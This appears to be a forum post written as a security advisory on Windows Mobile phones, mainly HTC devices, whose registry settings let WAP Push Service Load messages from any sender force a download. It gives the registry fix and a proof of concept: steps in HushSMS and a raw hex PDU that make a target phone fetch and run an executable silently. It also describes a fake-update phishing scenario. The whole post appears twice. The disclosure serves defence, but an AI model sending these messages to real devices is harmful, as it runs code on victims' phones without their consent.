Windows Mobile Security Advisory: Manufacturers leave device open for WAP-Push based attacks
--------------------------------------------------------------------------------------------
Description:
------------
WAP Push SI (Service Indication) and SL (Service Load) are so called "Service SMS". These messages are used by operators to notify about software updates or to deploy them directly. Microsoft implemented a security policy to ensure that these messages are accepted only from trusted orginators. This policy is defined in the device registry. If improper settings are applied to this policy attackers can send malicious content to the device which then displays or executes the content immediately. This leaves the device open for further attack scenarios.
Workaround / Fixes:
-------------------
Open your device registry and navigate to:
HKLM\Security\Policies\Policies
Check the values of the following DWORDs:
0x0000100c
and
0x0000100d
Microsofts recommends the following values for these:
0x0000100c : 0x800
0x0000100d : 0xc00
If they are for example 0x840 and 0xc40 your device is wide open and vulnerable. Change the keys to
the Microsoft recommendation. They are effective immediately.
Proof of concept:
-----------------
For testing purposes check the above registry keys and set them to a faulty value (like the above
0x840 and 0xc40). Then use a program like PDUSpy or HushSMS to do some testings.
HushSMS is able to send these kind of messages from windows mobile based devices.
Get HushSMS from http://www.silentservices.de/HushSMS.html
Download the latest version (currently v0.6beta) and install it on your device.
Execute HushSMS and type in the number of the receipient windows mobile phone.
In the message body field type in the following (note without a leading HTTP://!!!):
www.silentservices.de/wapsltest.exe
Click Send->Send WAPSL
Watch your target device. If it starts connecting via GPRS it will then download the above sample
program and executes it immediatly without user interaction.
If you want to test your target device with PDUSpy use the follwing sample message:
UDH: 05040b8423f0
Message(hex):
DC0605B0AF82B48302066A008509037777772e73696c656e7473657276696365732e64652f77617074657374736c2e65786
5000501
Edit: Added a youtube video in post #4
EDIT 19.09.2008: Some clarifications
Well, I received my brand new raphael two weeks ago and guess what, the values set by HTC by default are even more worse.
They set 4108 (0x100c) to 0x840
and set 4109 (0x100d) to 0x40
These means in detail:
Accept WAP Push Service Load Messages orgination from authenticated and trusted PPGs (Push Proxy Getways) AND any.
Accept WAP Push Service Indication Messages origination from any.
Hell, I informed HTC a long while ago about these issues, I wrote them several mails but all I got was some standard response like "Thank you, we will look into it".
However some may say:"Hey that's not that worse, I have opera set as my default browser and opera asks me each time what I want to do with this automagically downloaded file, so I'm safe as I always click on drop or simply close my opera window."
Well, since this is fine for people who "know what they are doing", but is is not for or these other people around there taht are using these devices and even don't have clue about what WAP Push is or what a security policy is or simply don't mind on clicking "accept" each time a message pops up ( and trust me when I say there are more people like this out there as you may guess).
Imagine the following scenario:
A malicious freak sets up a domain which is called www.htcupdateservice.com and hosts dangerous files on that domain. Now he sends out WAP Push SL messages to normal users of Windows Mobile phones with these faulty settings with the text:"HTC has to inform you about a critical security update. Donwload ist at http://www.htcupdateservice.com/Update3.6.9.exe"
What do you guess what enough people out there will do? Do you really think that most people that are not trained about security won't click on execute or download in their opera browser?
And what about people that dont have opera set as their default browser? You guessed right, the file will be downloaded and executed without user interaction. BOOM...
Here's another scenario:
Imagine a security vunlerability in opera mobile is discovered that can be exploited if the user visits a malicious webpages. You can guess how someone can force the user to visit this infectious webpage, can't you? ;-)
Or, let's say a malicious freak on the net sets up a webpages that utilizes CSRF attacks, or XSS, or whatever web based attack you may know. Using WAP Push SL messages he can force your browser to become the attacker and the victim with only one message.
It's up to you to care about this or not since HTC doesn't seem to care.
Cheers
--------------------------------------------------------------------------------------------
Description:
------------
WAP Push SI (Service Indication) and SL (Service Load) are so called "Service SMS". These messages are used by operators to notify about software updates or to deploy them directly. Microsoft implemented a security policy to ensure that these messages are accepted only from trusted orginators. This policy is defined in the device registry. If improper settings are applied to this policy attackers can send malicious content to the device which then displays or executes the content immediately. This leaves the device open for further attack scenarios.
Workaround / Fixes:
-------------------
Open your device registry and navigate to:
HKLM\Security\Policies\Policies
Check the values of the following DWORDs:
0x0000100c
and
0x0000100d
Microsofts recommends the following values for these:
0x0000100c : 0x800
0x0000100d : 0xc00
If they are for example 0x840 and 0xc40 your device is wide open and vulnerable. Change the keys to
the Microsoft recommendation. They are effective immediately.
Proof of concept:
-----------------
For testing purposes check the above registry keys and set them to a faulty value (like the above
0x840 and 0xc40). Then use a program like PDUSpy or HushSMS to do some testings.
HushSMS is able to send these kind of messages from windows mobile based devices.
Get HushSMS from http://www.silentservices.de/HushSMS.html
Download the latest version (currently v0.6beta) and install it on your device.
Execute HushSMS and type in the number of the receipient windows mobile phone.
In the message body field type in the following (note without a leading HTTP://!!!):
www.silentservices.de/wapsltest.exe
Click Send->Send WAPSL
Watch your target device. If it starts connecting via GPRS it will then download the above sample
program and executes it immediatly without user interaction.
If you want to test your target device with PDUSpy use the follwing sample message:
UDH: 05040b8423f0
Message(hex):
DC0605B0AF82B48302066A008509037777772e73696c656e7473657276696365732e64652f77617074657374736c2e65786
5000501
Edit: Added a youtube video in post #4
EDIT 19.09.2008: Some clarifications
Well, I received my brand new raphael two weeks ago and guess what, the values set by HTC by default are even more worse.
They set 4108 (0x100c) to 0x840
and set 4109 (0x100d) to 0x40
These means in detail:
Accept WAP Push Service Load Messages orgination from authenticated and trusted PPGs (Push Proxy Getways) AND any.
Accept WAP Push Service Indication Messages origination from any.
Hell, I informed HTC a long while ago about these issues, I wrote them several mails but all I got was some standard response like "Thank you, we will look into it".
However some may say:"Hey that's not that worse, I have opera set as my default browser and opera asks me each time what I want to do with this automagically downloaded file, so I'm safe as I always click on drop or simply close my opera window."
Well, since this is fine for people who "know what they are doing", but is is not for or these other people around there taht are using these devices and even don't have clue about what WAP Push is or what a security policy is or simply don't mind on clicking "accept" each time a message pops up ( and trust me when I say there are more people like this out there as you may guess).
Imagine the following scenario:
A malicious freak sets up a domain which is called www.htcupdateservice.com and hosts dangerous files on that domain. Now he sends out WAP Push SL messages to normal users of Windows Mobile phones with these faulty settings with the text:"HTC has to inform you about a critical security update. Donwload ist at http://www.htcupdateservice.com/Update3.6.9.exe"
What do you guess what enough people out there will do? Do you really think that most people that are not trained about security won't click on execute or download in their opera browser?
And what about people that dont have opera set as their default browser? You guessed right, the file will be downloaded and executed without user interaction. BOOM...
Here's another scenario:
Imagine a security vunlerability in opera mobile is discovered that can be exploited if the user visits a malicious webpages. You can guess how someone can force the user to visit this infectious webpage, can't you? ;-)
Or, let's say a malicious freak on the net sets up a webpages that utilizes CSRF attacks, or XSS, or whatever web based attack you may know. Using WAP Push SL messages he can force your browser to become the attacker and the victim with only one message.
It's up to you to care about this or not since HTC doesn't seem to care.
Cheers
Last edited: